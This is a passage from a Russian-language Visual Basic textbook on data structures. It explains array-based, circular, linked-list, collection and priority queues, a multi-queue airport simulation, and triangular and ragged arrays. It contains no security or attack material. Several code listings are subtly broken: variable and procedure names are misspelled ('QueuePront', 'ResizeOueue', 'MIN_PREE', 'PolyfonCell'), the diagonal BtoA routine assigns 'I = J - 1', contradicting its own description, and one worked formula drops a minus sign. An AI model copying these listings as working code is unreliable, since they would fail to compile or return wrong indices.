Основной недостаток применения стеков на основе связных списков состоит в том, что они требуют дополнительной памяти для хранения указателей NextCell. Для стека на основе массива, содержащего N элементов, требуется всего 2*N байт памяти (по 2 байта на целое число). Тот же стек, реализованный на основе связного списка, потребует дополнительно 4*N байт памяти для указателей NextCell, увеличивая размер необходимой памяти втрое.
Программа Stack использует несколько стеков, реализованных в виде связных списков. Используя программу, можно вставлять и выталкивать элементы из каждого из этих списков. Программа Stack2 аналогична этой программе, но она использует класс LinkedListStack для работы со стеками.
Очереди
Упорядоченный список, в котором элементы добавляются к одному концу списка, а удаляются с другой стороны, называется очередью (queue). Группа людей, ожидающих обслуживания в магазине, образует очередь. Вновь прибывшие подходят сзади. Когда покупатель доходит до начала очереди, кассир его обслуживает. Изза их природы, очереди иногда называют списками типа первый вошел — первый вышел (FirstInFirstOut list).
@Рис. 3.1. Два стека в одном массиве
=======52
Можно реализовать очереди в Visual Basic, используя методы типа использованных для организации простых стеков. Создадим массив, и при помощи счетчиков будем определять положение начала и конца очереди. Значение переменной QueueFront дает индекс элемента в начале очереди. Переменная QueueBack определяет, куда должен быть добавлен очередной элемент очереди. По мере того как новые элементы добавляются в очередь и покидают ее, размер массива, содержащего очередь, изменяется так, что он растет на одном конце и уменьшается на другом.
Global Queue() As String ' Массив очереди.
Global QueuePront As Integer ' Начало очереди.
Global QueueBack As Integer ' Конец очереди.
Sub EnterQueue(value As String)
ReDim Preserve Queue(QueueFront To QueueBack)
Queue(QueueBack) = value
QueueBack = QueueBack + 1
End Sub
Sub LeaveQueue(value As String)
value = Queue(QueueFront)
QueueFront = QueueFront + 1
ReDim Preserve Queue (QueueFront To QueueBack - 1)
End Sub
К сожалению, Visual Basic не позволяет использовать ключевое слово Preserve в операторе ReDim, если изменяется нижняя граница массива. Даже если бы Visual Basic позволял выполнение такой операции, очередь при этом «двигалась» бы по памяти. При каждом добавлении или удалении элемента из очереди, границы массива увеличивались бы. После пропускания достаточно большого количества элементов через очередь, ее границы могли бы в конечном итоге стать слишком велики.
Поэтому, когда требуется увеличить размер массива, вначале необходимо переместить данные в начало массива. При этом может образоваться достаточное количество свободных ячеек в конце массива, так что увеличение размера массива может уже не понадобиться. В противном случае, можно воспользоваться оператором ReDim для увеличения или уменьшения размера массива.
Как и в случае со списками, можно повысить производительность, добавляя сразу несколько элементов при увеличении размера массива. Также можно сэкономить время, уменьшая размер массива, только когда он содержит слишком много неиспользуемых ячеек.
В случае простого списка или стека, элементы добавляются и удаляются на одном его конце. Если размер списка остается почти постоянным, его не придется изменять слишком часто. С другой стороны, так как элементы добавляются на одном конце очереди, а удаляются с другого конца, может потребоваться время от времени переупорядочивать очередь, даже если ее размер остается неизменным.
=====53
Const WANT_FREE_PERCENT = .1 ' 10% свободного пространства.
Const MIN_FREE = 10 ' Минимум свободных ячеек.
Global Queue() As String ' Массив очереди.
Global QueueMax As Integer ' Наибольший индекс массива.
Global QueueFront As Integer ' Начало очереди.
Global QueueBack As Integer ' Конец очереди.
Global ResizeWhen As Integer ' Когда увеличить размер массива.
' При инициализации программа должна установить QueueMax = -1
' показывая, что под массив еще не выделена память.
Sub EnterQueue(value As String)
If QueueBack > QueueMax Then ResizeQueue
Queue(QueueBack) = value
QueueBack = QueueBack + 1
End Sub
Sub LeaveQueue(value As String)
value = Queue(QueueFront)
QueueFront = QueueFront + 1
If QueueFront > ResizeWhen Then ResizeOueue
End Sub
Sub ResizeQueue()
Dim want_free As Integer
Dim i As Integer
' Переместить записи в начало массива.
For i = QueueFront To QueueBack - 1
Queue(i - QueueFront) = Queue(i)
Next i
QueueBack = QueueBack - QueuePront
QueueFront = 0
' Изменить размер массива.
want_free = WANT_FREE_PERCENT * (QueueBack - QueueFront)
If want_free < MIN_FREE Then want_free = MIN_FREE
Max = QueueBack + want_free - 1
ReDim Preserve Queue(0 To Max)
' Если QueueFront > ResizeWhen, изменить размер массива.
ResizeWhen = want_free
End Sub
При работе с программой, заметьте, что когда вы добавляете и удаляете элементы, требуется изменение размера очереди, даже если размер очереди почти не меняется. Фактически, даже при неоднократном добавлении и удалении одного элемента размер очереди будет изменяться.
Имейте в виду, что при каждом изменении размера очереди, вначале все используемые элементы перемещаются в начало массива. При этом на изменение размера очередей на основе массива уходит больше времени, чем на изменение размера описанных выше связных списков и стеков.
=======54
Программа ArrayQ2 аналогична программе ArrayQ, но она использует для управления очередью класс ArrayQueue.
Циклические очереди
Очереди, описанные в предыдущем разделе, требуется переупорядочивать время от времени, даже если размер очереди почти не меняется. Даже при неоднократном добавлении и удалении одного элемента будет необходимо переупорядочивать очередь.
Если заранее известно, насколько большой может быть очередь, этого можно избежать, создав циклическую очередь (circular queue). Идея заключается в том, чтобы рассматривать массив очереди как будто он заворачивается, образуя круг. При этом последний элемент массива как бы идет перед первым. На рис. 3.2 изображена циклическая очередь.
Программа может хранить в переменной QueueFront индекс элемента, который дольше всего находится в очереди. Переменная QueueBack может содержать конец очереди, в который добавляется новый элемент.
В отличие от предыдущей реализации, при обновлении значений переменных QueueFront и QueueBack, необходимо использовать оператор Mod для того, чтобы индексы оставались в границах массива. Например, следующий код добавляет элемент к очереди:
Queue(QueueBack) = value
QueueBack = (QueueBack + 1) Mod QueueSize
На рис. 3.3 показан процесс добавления нового элемента к циклической очереди, которая может содержать четыре записи. Элемент C добавляется в конец очереди. Затем конец очереди сдвигается, указывая на следующую запись в массиве.
Таким же образом, когда программа удаляет элемент из очереди, необходимо обновлять указатель на начало очереди при помощи следующего кода:
value = Queue(QueueFront)
QueueFront = (QueueFront + 1) Mod QueueSize
@Рис. 3.2. Циклическая очередь
=======55
@Рис. 3.3. Добавление элемента к циклической очереди
На рис. 3.4 показан процесс удаления элемента из циклической очереди. Первый элемент, в данном случае элемент A, удаляется из начала очереди, и указатель на начало очереди обновляется, указывая на следующий элемент массива.
Для циклических очередей иногда бывает сложно отличить пустую очередь от полной. В обоих случаях значения переменных QueueBottom и QueueTop будут равны. На рис. 3.5 показаны две циклические очереди, пустая и полная.
Простой вариант решения этой проблемы — сохранять число элементов в очереди в отдельной переменной NumInQueue. При помощи этого счетчика можно узнать, остались ли в очереди еще элементы, и осталось ли в очереди место для новых элементов.
@Рис. 3.4. Удаление элемента из циклической очереди
@Рис. 3.5 Полная и пустая циклическая очереди
=========56
Следующий код использует все эти методы для управления циклической очередью:
Queue() As String ' Массив очереди.
QueueSize As Integer ' Наибольший индекс в очереди.
QueueFront As Integer ' Начало очереди.
QueueBack As Integer ' Конец очереди.
NumInQueue As Integer ' Число элементов в очереди.
Sub NewCircularQueue(num_items As Integer)
QueueSize = num_items
ReDim Queue(0 To QueueSize - 1)
End Sub
Sub EnterQueue(value As String)
' Если очередь заполнена, выйти из процедуры.
' В настоящем приложении потребуется более сложный код.
If NumInQueue >= QueueSize Then Exit Sub
Queue(QueueBack) = value
QueueBack = (QueueBack + 1) Mod QueueSize
NumInQueue = NumInQueue + 1
End Sub
Sub LeaveQueue (value As String)
' Если очередь пуста, выйти из процедуры.
' В настоящем приложении потребуется более сложный код.
If NumInQueue <= 0 Then Exit Sub
value = Queue (QueueFront)
QueueFront = (QueueFront + 1) Mod QueueSize
NumInQueue = NumInQueue - 1
End Sub
Так же, как и в случае со списками на основе массивов, можно изменять размер массива, когда очередь полностью заполнится или если в массиве будет слишком много неиспользуемого пространства. Тем не менее, изменение размера циклической очереди сложнее, чем изменить размер стека или списка, основанного на массиве.
Когда изменяется размер массива, конец очереди может не совпадать с концом массива. Если просто увеличить массив, то вставляемые элементы будут находиться в конце массива, так что они попадут в середину списка. На рис. 3.6 показано, что может произойти при таком увеличении массива.
===========57
При уменьшении размера массива возникают похожие проблемы. Если элементы огибают конец массива, то элементы в конце массива, которые будут находиться в начале очереди, будут потеряны.
Для того чтобы избежать этих затруднений, необходимо переупорядочить массив перед тем, как изменять его размер. Проще всего это сделать, используя временный массив. Скопируем элементы очереди во временный массив в правильном порядке, поменяем размер массива очереди, и затем скопируем элементы из временного массива обратно в массив очереди.
Private Sub EnterQueue(value As String)
If NumInQueue >= QueueSize Then ResizeQueue
Queue(QueueBack) = value
QueueBack = (QueueBack + 1) Mod QueueSize
NumInQueue = NumInQueue + 1
End Sub
Private Sub LeaveQueue(value As String)
If NumInQueue <= 0 Then Exit Sub
value = Queue (QueueFront)
QueueFront = (QueueFront + 1) Mod QueueSize
NumInQueue = NumInQueue - 1
If NumInQueue < ShrinkWhen Then ResizeQueue
End Sub
Sub ResizeQueue()
Dim temp() As String
Dim want_free As Integer
Dim i As Integer
' Скопировать элементы во временный массив.
ReDim temp(0 To NumInQueue - 1)
For i = 0 To NumInQueue - 1
temp(i) = Queue((i + QueueFront) Mod QueueSize)
Next i
' Изменить размер массива.
want_free = WANT_FREE_PERCENT * NumInQueue
If want_free < MIN_PREE Then want_free = MIN_FREE
QueueSize = NumInQueue + want_free
ReDim Queue(0 To QueueSize - 1)
For i = 0 To NumInQueue - 1
Queue(i) = temp(i)
Next i
QueueFront = 0
QueueBack = NumInQueue
' Уменьшить размер массива, если NunInQueue < ShrinkWhen.
ShrinkWhen = QueueSize - 2 * want_free
' Не менять размер небольших очередей. Это может вызвать
' проблемы с "ReDim temp(0 To NumInQueue - 1)" выше и
' просто глупо!
If ShrinkWhen < 3 Then ShrinkWhen = 0
End Sub
Программа CircleQ демонстрирует этот подход к реализации циклической очереди. Введите строку и нажмите кнопку Enter (Ввести) для добавления нового элемента в очередь. Нажмите на кнопку Leave (Покинуть) для удаления верхнего элемента из очереди. Программа будет при необходимости изменять размер очереди.
Программа CircleQ2 аналогична программе CircleQ, но она использует для работы с очередью класс CircleQueue.
Помните, что при каждом изменении размера очереди в программе, она копирует элементы во временный массив, изменяет размер очереди, а затем копирует элементы обратно. Эти дополнительные шаги делают изменение размера циклических очередей более медленным, чем изменение размера связных списков и стеков. Даже очереди на основе массивов, в которых также требуются дополнительные действия для изменения размера, не требуют такого объема работы.
С другой стороны, если число элементов в очереди не сильно меняется, и если правильно задать параметры изменения размера, может никогда не понадобиться менять размер массива. Даже если иногда это всетаки придется делать, уменьшение частоты этих изменений стоит дополнительных усилий на программирование.
Очереди на основе связных списков
Совсем другой подход к реализации очередей состоит в использовании двусвязных списков. Для отслеживания начала и конца списка можно использовать сигнальные метки. Новые элементы добавляются в очередь перед меткой в конце очереди, а элементы, следующие за меткой начала очереди, удаляются. На рис. 3.7 показан двусвязный список, который используется в качестве очереди.
===========58-59
Добавлять и удалять элементы из двусвязного списка легко, поэтому в этом случае не потребуется применять сложных алгоритмов для изменения размера. Преимущество этого метода также в том, что он интуитивно понятнее по сравнению с циклической очередью на основе массива. Недостаток его в том, что для указателей связного списка NextCell и PrevCell требуется дополнительная память. В отношении занимаемой памяти очереди на основе связных списков немного менее эффективны, чем циклические списки.
Программа LinkedQ работает с очередью при помощи двусвязного списка. Введите строку, нажмите на кнопку Enter, чтобы добавить элемент в конец очереди. Нажмите на кнопку Leave для удаления элемента из очереди.
Программа LinkedQ2 аналогична программе LinkedQ, но она использует для управления очередью класс LinkedListqueue.
Применение коллекций в качестве очередей
Коллекции Visual Basic представляют собой очень простую форму очереди. Программа может использовать метод Add коллекции для добавления элемента в конец очереди, и метод Remove с параметром 1 для удаления первого элемента из очереди. Следующий код управляет очередью на основе коллекций:
Dim Queue As New Collection
Private Sub EnterQueue(value As String)
Queue.Add value
End Sub
Private Function LeaveQueue() As String
LeaveQueue = Queue.Item(1)
Queue.Remove 1
Еnd Function
@Рис. 3.7. Очередь на основе связного списка
=======60
Несмотря на то, что этот код очень прост, коллекции в действительности не предназначены для использования в качестве очередей. Они предоставляют дополнительные возможности, такие как ключи элементов, и поддержка этих дополнительных возможностей делает коллекции более медленными, чем другие реализации очередей. Тем не менее, очереди на основе коллекций настолько просты, что они могут быть приемлемым выбором для приложений, в которых производительность не является проблемой.
Программа CollectQ демонстрирует очередь на основе коллекций.
Приоритетные очереди
Каждый элемент в приоритетной очереди (priority queue) имеет связанный с ним приоритет. Если программе нужно удалить элемент из очереди, она выбирает элемент с наивысшим приоритетом. Как хранятся элементы в приоритетной очереди, не имеет значения, если программа всегда может найти элемент с наивысшим приоритетом.
Некоторые операционные системы использую приоритетные очереди для планирования заданий. В операционной системе UNIX все процессы имеют разные приоритеты. Когда процессор освобождается, выбирается готовый к исполнению процесс с наивысшим приоритетом. Процессы с более низким приоритетом должны ждать завершения или блокировки (например, при ожидании внешнего события, такого как чтение данных с диска) процессов с более высокими приоритетами.
Концепция приоритетных очередей также используется при управлении авиаперевозками. Наивысший приоритет имеют самолеты, у которых кончается топливо во время посадки. Второй приоритет имеют самолеты, заходящие на посадку. Третий приоритет имеют самолеты, находящиеся на земле, так как они находятся в более безопасном положении, чем самолеты в воздухе. Приоритеты изменяются со временем, так как у самолетов, которые пытаются приземлиться, в конце концов, закончится топливо.
Простой способ организации приоритетной очереди — поместить все элементы в список. Если требуется удалить элемент из очереди, можно найти в списке элемент с наивысшем приоритетом. Чтобы добавить элемент в очередь, он помещается в начало списка. При использовании этого метода, для добавления нового элемента в очередь требуется только один шаг. Чтобы найти и удалить элемент с наивысшим приоритетом, требуется O(N) шагов, если очередь содержит N элементов.
Немного лучше была бы схема с использованием связного списка, в котором элементы были бы упорядочены в прямом или обратном порядке. Используемый в списке класс PriorityCell мог бы объявлять переменные следующим образом:
Public Priority As Integer ' Приоритет элемента.
Public NextCell As PriorityCell ' Указатель на следующий элемент.
Public Value As String ' Данные, нужные программе.
Чтобы добавить элемент в очередь, нужно найти его правильное положение в списке и поместить его туда. Чтобы упростить поиск положения элемента, можно использовать сигнальные метки в начале и конце списка, присвоив им соответствующие приоритеты. Например, если элементы имеют приоритеты от 0 до 100, можно присвоить метке начала приоритет 101 и метке конца — приоритет 1. Приоритеты всех реальных элементов будут находиться между этими значениями.
На рис. 3.8 показана приоритетная очередь, реализованная на основе связного списка.
=====61
@Рис. 3.8. Приоритетная очередь на основе связного списка
Следующий фрагмент кода показывает ядро этой процедуры поиска:
Dim cell As PriorityCell
Dim nxt As PriorityCell
' Найти место элемента в списке.
cell = TopSentinel
nxt = cell.NextCell
Do While cell.Priority > new_priority
cell = nxt
nxt = cell.NextCell
Loop
' Вставить элемент после ячейки в списке.
:
Для удаления из списка элемента с наивысшим приоритетом, просто удаляется элемент после сигнальной метки начала. Так как список отсортирован в порядке приоритетов, первый элемент всегда имеет наивысший приоритет.
Добавление нового элемента в эту очередь занимает в среднем N/2 шагов. Иногда новый элемент будет оказываться в начале списка, иногда ближе к концу, но в среднем он будет оказываться гдето в середине. Простая очередь на основе списка требовала O(1) шагов для добавления нового элемента и O(N) шагов для удаления элементов с наивысшим приоритетом из очереди. Версия на основе упорядоченного связного списка требует O(N) шагов для добавления элемента и O(1) шагов для удаления верхнего элемента. Обеим версиям требует O(N) шагов для одной из этих операций, но в случае упорядоченного связного списка в среднем требуется только (N/2) шагов.
Программа PriList использует упорядоченный связный список для работы с приоритетной очередью. Вы можете задать приоритет и значение элемента данных и нажать кнопку Enter для добавления его в приоритетную очередь. Нажмите на кнопку Leave для удаления из очереди элемента с наивысшим приоритетом.
Программа PriList2 аналогична программе PriList, но она использует для управления очередью класс LinkedPriorityQueue.
========63
Затратив еще немного усилий, можно построить приоритетную очередь, в которой добавление и удаление элемента потребуют порядка O(log(N)) шагов. Для очень больших очередей, ускорение работы может стоить этих усилий. Этот тип приоритетных очередей использует структуры данных в виде пирамиды, которые также применяются в алгоритме пирамидальной сортировки. Пирамиды и приоритетные очереди на их основе обсуждаются более подробно в 9 главе.
Многопоточные очереди
Интересной разновидностью очередей являются многопоточные очереди (multiheaded queues). Элементы, как обычно, добавляются в конец очереди, но очередь имеет несколько потоков (front end) или голов (heads). Программа может удалять элементы из любого потока.
Примером многопоточной очереди в обычной жизни является очередь клиентов в банке. Все клиенты находятся в одной очереди, но их обслуживает несколько служащих. Освободившийся банковский работник обслуживает клиента, который находится в очереди первым. Такой порядок обслуживания кажется справедливым, поскольку клиенты обслуживаются в порядке прибытия. Он также эффективен, так как все служащие остаются занятыми до тех пор, пока клиенты ждут в очереди.
Сравните этот тип очереди с несколькими однопоточными очередями в супермаркете, в которых покупатели не обязательно обслуживаются в порядке прибытия. Покупатель в медленно движущейся очереди, может прождать дольше, чем тот, который подошел позже, но оказался в очереди, которая продвигается быстрее. Кассиры также могут быть не всегда заняты, так как какаялибо очередь может оказаться пустой, тогда как в других еще будут находиться покупатели.
В общем случае, многопоточные очереди более эффективны, чем несколько однопоточных очередей. Последний вариант используется в супермаркетах потому, что тележки для покупок занимают много места. При использовании многопоточной очереди всем покупателям пришлось бы построиться в одну очередь. Когда кассир освободится, покупателю пришлось бы переместиться с громоздкой тележкой к кассиру. С другой стороны, в банке посетителям не нужно двигать большие тележки для покупок, поэтому они легко могут уместиться в одной очереди.
Очереди на регистрацию в аэропорту иногда представляют собой комбинацию этих двух ситуаций. Хотя пассажиры имеют с собой большое количество багажа, в аэропорту всетаки используются многопоточные очереди, при этом приходится отводить дополнительное место, чтобы пассажиры могли выстроиться в порядке очереди.
Многопоточную очередь просто построить, используя обычную однопоточную очередь. Элементы, представляющие клиентов, хранятся в обычной однопоточной очереди. Когда агент (кассир, банковский служащий и т.д.) освобождается, первый элемент в начале очереди удаляется и передается этому агенту.
Модель очереди
Предположим, что вы отвечаете за разработку счетчика регистрации для нового терминала в аэропорту и хотите сравнить возможности одной многопоточной очереди или нескольких однопоточных. Вам потребуется какаято модель поведения пассажиров. Для этого примера можно сделать следующие предположения:
=====63
регистрация каждого пассажира занимает от двух до пяти минут;
при использовании нескольких однопоточных очередей, прибывающие пассажиры встают в самую короткую очередь;
скорость поступления пассажиров примерно неизменна.
Программа HeadedQ моделирует эту ситуацию. Вы можете менять некоторые параметры модели, включая следующие:
число прибывающих в течение часа пассажиров;
минимальное и максимальное затрачиваемое время;
число свободных служащих;
паузу между шагами программы в миллисекундах.
При выполнении программы, модель показывает прошедшее время, среднее и максимальное время ожидания пассажирами обслуживания, и процент времени, в течение которого служащие заняты.
При экспериментировании с различными значениями параметров, вы заметите несколько любопытных моментов. Во-первых, для многопоточной очереди среднее и максимальное время ожидания будет меньше. При этом, служащие также оказываются немного более загружены, чем в случае однопоточной очереди.
Для обоих типов очереди есть порог, при котором время ожидания пассажиров значительно возрастает. Предположим, что на обслуживание одного пассажира требуется от 2 до 10 минут, или в среднем 6 минут. Если поток пассажиров составляет 60 человек в час, тогда персонал потратит около 6*60=360 минут в час на обслуживание всех пассажиров. Разделив это значение на 60 минут в часе, получим, что для обслуживания клиентов в этом случае потребуется 6 клерков.
Если запустить программу HeadedQ с этими параметрами, вы увидите, что очереди движутся достаточно быстро. Для многопоточной очереди время ожидания составит всего несколько минут. Если добавить еще одного служащего, чтобы всего было 7 служащих, среднее и максимальное время ожидания значительно уменьшатся. Среднее время ожидания упадет примерно до одной десятой минуты.
С другой стороны, если уменьшить число служащих до 5, это приведет к большому увеличению среднего и максимального времени ожидания. Эти показатели также будут расти со временем. Чем дольше будет работать программа, тем дольше будут задержки.
@Таблица 3.1. Время ожидания в минутах для одно и многопоточных очередей
======64
@Рис. 3.9. Программа HeadedQ
В табл. 3.1 приведены среднее и максимальное время ожидания для 2 разных типов очередей. Программа моделирует работу в течение 3 часов и предполагает, что прибывает 60 пассажиров в час и на обслуживание каждого из них уходит от 2 до 10 минут.
Многопоточная очередь также кажется более справедливой, так как пассажиры обслуживаются в порядке прибытия. На рис. 3.9 показана программа HeadedQ после моделирования чуть более, чем двух часов работы терминала. В многопоточной очереди первым стоит пассажир с номером 104. Все пассажиры, прибывшие до него, уже обслужены или обслуживаются в настоящий момент. В однопоточной очереди, обслуживается пассажир с номером 106. Пассажиры с номерами 100, 102, 103 и 105 все еще ждут своей очереди, хотя они и прибыли раньше, чем пассажир с номером 106.
Резюме
Разные реализации стеков и очередей обладают различными свойствами. Стеки и циклические очереди на основе массивов просты и эффективны, в особенности, если заранее известно насколько большим может быть их размер. Связные списки обеспечивают большую гибкость, если размер списка часто изменяется.
Стеки и очереди на основе коллекций Visual Basic не так эффективны, как реализации на основе массивов, но они очень просты. Коллекции могут подойти для небольших структур данных, если производительность не критична. После тестирования приложения, можно переписать код для стека или очереди, если коллекции окажутся слишком медленными.
Глава 4. Массивы
В этой главе описаны структуры данных в виде массивов. С помощью Visual Basic вы можете легко создавать массивы данных стандартных или определенных пользователем типов. Если определить массив без границ, затем можно изменять его размер при помощи оператора ReDim. Эти свойства делают применение массивов в Visual Basic очень полезным.
Некоторые программы используют особые типы массивов, которые не поддерживаются Visual Basic непосредственно. К этим типа относятся треугольные массивы, нерегулярные массивы и разреженные массивы. В этой главе объясняется, как можно использовать гибкие структуры массивов, которые могут значительно снизить объем занимаемой памяти.
Треугольные массивы
Некоторым программам требуется только половина элементов в двумерном массиве. Предположим, что мы располагаем картой, на которой 10 городов обозначены цифрами от 0 до 9. Можно использовать массив для создания матрицы смежности (adjacency matrix), показывающей наличие автострады между парами городов. Элемент A(I,J) равен True, если между городами I и J есть автострада.
В этом случае, значения в половине матрицы будут дублировать значения в другой ее половине, так как A(I, J)=A(J, I). Также элемент A(I, I) не имеет смысла, так как бессмысленно строить автостраду из города I в тот же самый город. В действительности потребуются только элементы A(I,J) из верхнего левого угла, для которых I > J. Вместо этого можно также использовать элементы из верхнего правого угла. Поскольку эти элементы образуют треугольник, этот тип массивов называется треугольным массивом (triangular array).
На рис. 4.1 показан треугольный массив. Элементы со значащими данными обозначены буквой X, ячейки, соответствующие дублирующимся элементам, оставлены пустыми. Незначащие элементы A(I,I) обозначены тире.
Для небольших массивов потери памяти при использовании обычных двумерных массивов для хранения таких данных не слишком существенны. Если же на карте много городов, потери памяти могут быть велики. Для N городов эти потери составят N*(N-1)/2 дублирующихся элементов и N незначащих диагональных элементов A(I,I). Если карта содержит 1000 городов, в массиве будет более полумиллиона ненужных элементов.
====67
@Рис. 4.1. Треугольный массив
Избежать потерь памяти можно, создав одномерный массив B и упаковав в него значащие элементы из массива A. Разместим элементы в массиве B по строкам, как показано на рис. 4.2. Заметьте, что индексы массивов начинаются с нуля. Это упрощает последующие уравнения.
Для того, чтобы упростить использование этого представления треугольного массива, можно написать функции для преобразования индексов массивов A и B. Уравнение для преобразования индекса A(I,J) в B(X) выглядит так:
X = I * (I - 1) / 2 + J ' Для I > J.
Например, для I=2 и J=1 получим X = 2 * (2 - 1) / 2 + 1 = 2. Это значит, что A(2,1) отображается на 2 позицию в массиве B, как показано на рис. 4.2. Помните, что массивы нумеруются с нуля.
Уравнение остается справедливым только для I > J. Значения других элементов массива A не сохраняются в массиве B, потому что они являются избыточными или незначащими. Если вам нужно получить значение A(I,J) при I < J, вместо этого следует вычислять значение A(J,I).
Уравнения для обратного преобразования B(X) в A(I,J) выглядит так:
I = Int((1 + Sqr(1 + 8 * X)) / 2)
J = X - I * (I - 1) / 2
@Рис. 4.2. Упаковка треугольного массива в одномерном массиве
=====68
Подстановка в эти уравнения X=4 дает I = Int((1 + Sqr(1 + 8 * 4)) / 2) = 3 и J = 4 – 3 * (3 1) / 2 = 1. Это означает, что элемент B(4) отображается на позицию A(3,1). Это также соответствует рис. 4.2.
Эти вычисления не слишком просты. Они требуют нескольких умножений и делений, и даже вычисления квадратного корня. Если программе придется выполнять эти функции очень часто, это внесет определенную задержку скорости выполнения. Это пример компромисса между пространством и временем. Упаковка треугольного массива в одномерный массив экономит память, хранение данных в двумерном массиве требует больше памяти, но экономит время.
Используя эти уравнения, можно написать процедуры Visual Basic для преобразования координат между двумя массивами:
Private Sub AtoB(ByVal I As Integer, ByVal J As Integer, X As Integer)
Dim tmp As Integer
If I = J Then ' Незначащий элемент.
X = -1
Exit Sub
ElseIf I < J Then ' Поменять местами I и J.
tmp = I
I = J
J = tmp
End If
X = I * (I - 1) / 2 + J
End Sub
Private Sub BtoA(ByVal X As Integer, I As Integer, J As Integer)
I = Int((1 + Sqr(1 + 8 * X)) / 2)
J = X - I * (I - 1) /2
End Sub
Программа Triang использует эти подпрограммы для работы с треугольными массивами. Если вы нажмете на кнопку A to B (Из A в B), программа пометит элементы в массиве A и скопирует эти метки в соответствующие элементы массива B. Если вы нажмете на кнопку B to A (Из B в A), программа пометит элементы в массиве B, и затем скопирует метки в массив A.
Программа Triangc использует класс TriangularArray для работы с треугольным массивом. При старте программы, она записывает в объект TriangularArray строки, представляющие собой элементы массива. Затем она извлекает и выводит на экран элементы массива.
Диагональные элементы
Некоторые программы используют треугольные массивы, которые включают диагональные элементы A(I, I). В этом случае необходимо внести только три изменения в процедуры преобразования индексов. Процедура преобразования AtoB не должна пропускать случаи с I=J, и должна добавлять к I единицу при подсчете индекса массива B.
=====69
Private Sub AtoB(ByVal I As Integer, ByVal J As Integer, X As Integer)
Dim tmp As Integer
If I < J Then ' Поменять местами I и J.
tmp = I
I = J
J = tmp
End If
I = I + 1
X = I * (I - 1) / 2 + J
End Sub
Процедура преобразования BtoA должна вычитать из I единицу перед возвратом значения.
Private Sub BtoA(ByVal X As Integer, I As Integer, J As Integer)
I = Int((1 + Sqr(1 + 8 * X)) / 2)
J = X - I * (I - 1) / 2
I = J - 1
End Sub
Программа Triang2 аналогична программе Triang, но она использует для работы с диагональными элементами в массиве A эти новые функции. Программа TriangC2 аналогична программе TriangC, но использует класс TriangularArray, который включает диагональные элементы.
Нерегулярные массивы
В некоторых программах нужны массивы нестандартного размера и формы. Двумерный массив может содержать шесть элементов в первом ряду, три — во втором, четыре — в третьем, и т.д. Это может понадобиться, например, для сохранения ряда многоугольников, каждый из которых состоит из разного числа точек. Массив будет при этом выглядеть, как на рис. 4.3.
Массивы в Visual Basic не могут иметь такие неровные края. Можно было бы использовать массив, достаточно большой для того, чтобы в нем могли поместиться все строки, но при этом в таком массиве было бы множество неиспользуемых ячеек. Например, массив на рис. 4.3 мог бы быть объявлен при помощи оператора Dim Polygons(1 To 3, 1 To 6), и при этом четыре ячейки останутся неиспользованными.
Существует несколько способов представления нерегулярных массивов.
@Рис. 4.3. Нерегулярный массив
=====70
Прямая звезда
Один из способов избежать потерь памяти заключается в том, чтобы упаковать данные в одномерном массиве B. В отличие от треугольных массивов, для нерегулярных массивов нельзя записать формулы для определения соответствия элементов в разных массивах. Чтобы справиться с этой задачей, можно создать еще один массив A со смещениями для каждой строки в одномерном массиве B.
Для упрощения определения в массиве B положения точек, соответствующих каждой строке, в конец массива A можно добавить сигнальную метку, которая указывает на точку сразу за последним элементом в массиве B. Тогда точки, образующие многоугольник I, занимают в массиве B позиции с A(I) до A(I+1)-1. Например, программа может перечислить элементы, образующие строку I, используя следующий код:
For J = A(I) To A(I + 1) - 1
‘ Внести в список элемент I.
:
Next J
Этот метод называется прямой звездой (forward star). На рис. 4.4 показано представление нерегулярного массива с рис. 4.3 в виде прямой звезды. Сигнальная метка закрашена серым цветом.
Этот метод можно легко обобщить для создания многомерных нерегулярных массивов. Для хранения набора рисунков, каждый из которых состоит из разного числа многоугольников, можно использовать трехмерную прямую звезду.
На рис. 4.5 схематически представлена трехмерная структура данных в виде прямой звезды. Две сигнальных метки закрашены серым цветом. Они указывают на одну позицию позади значащих данных в массиве.
Такое представление в виде прямой звезды требует очень небольших затрат памяти. Только память, занимаемая сигнальными метками, расходуется «впустую».
При использовании структуры данных прямой звезды легко и быстро можно перечислить точки, образующие многоугольник. Так же просто сохранять такие данные на диске и загружать их обратно в память. С другой стороны, обновлять массивы, записанные в формате прямой звезды, очень сложно. Предположим, вы хотите добавить новую точку к первому многоугольнику на рис. 4.4. Для этого понадобится сдвинуть все элементы справа от новой точки на одну позицию, чтобы освободить место для нового элемента. Затем нужно добавить по единице ко всем элементам массива A, которые идут после первого, чтобы учесть сдвиг, вызванный добавлением точки. И, наконец, надо вставить новый элемент. Сходные проблемы возникают при удалении точки из первого многоугольника.
@Рис. 4.4. Представления нерегулярного массива в виде прямой звезды
=====71
@Рис. 4.5. Трехмерная прямая звезда
На рис. 4.6 показано представление в виде прямой звезды с рис. 4.4 после добавления одной точки к первому многоугольнику. Элементы, которые были изменены, закрашены серым цветом. Как видно из рисунка, почти все элементы в обоих массивах были изменены.
Нерегулярные связные списки
Другим методом создания нерегулярных массивов является использование связных списков. Каждая ячейка содержит указатель на следующую ячейку на том же уровне иерархии, и указатель на список ячеек на более низком уровне иерархии. Например, ячейка многоугольника может содержать указатель на следующий многоугольник и указатель на ячейку, содержащую координаты первой точки.
Следующий код приводит определения переменных для классов, которые можно использовать для создания связного списка рисунков. Каждый из рисунков содержит связный список многоугольников, каждый из которых содержит связный список точек.
В классе PictureCell:
Dim NextPicture As PictureCell ' Следующий рисунок.
Dim FirstPolygon As PolyfonCell ' Первый многоугольник на этом рисунке.
В классе PolygonCell:
Dim NextPolygon As PolygonCell ' Следующий многоугольник.
Dim FirstPoint As PointCell ' Первая точка в этом многоугольнике.
В классе PointCell:
@Рис. 4.6. Добавление точки к прямой звезде
======72
Dim NextPoint As PointCell ' Следующая точка в этом многоугольнике.
Dim X As Single ' Координаты точки.
Dim Y As Single
Используя эти методы, можно легко добавлять и удалять рисунки, многоугольники или точки в любом месте структуры данных.
Программа Poly на диске содержит связный список многоугольников. Каждый многоугольник содержит связный список точек. Когда вы закрываете форму, ссылка на список многоугольников из формы уничтожается. Это уменьшает счетчик ссылок на верхнюю ячейку многоугольников до нуля. Она уничтожается, поэтому ее ссылки на следующий многоугольник и его первую точку также уничтожаются. Счетчики ссылок на эти ячейки также уменьшаются до нуля, и они тоже уничтожаются. Уничтожение каждой ячейки многоугольника или точки приводит к уничтожению следующей ячейки. Этот процесс продолжается до тех пор, пока все многоугольники и точки не будут уничтожены.
Разреженные массивы
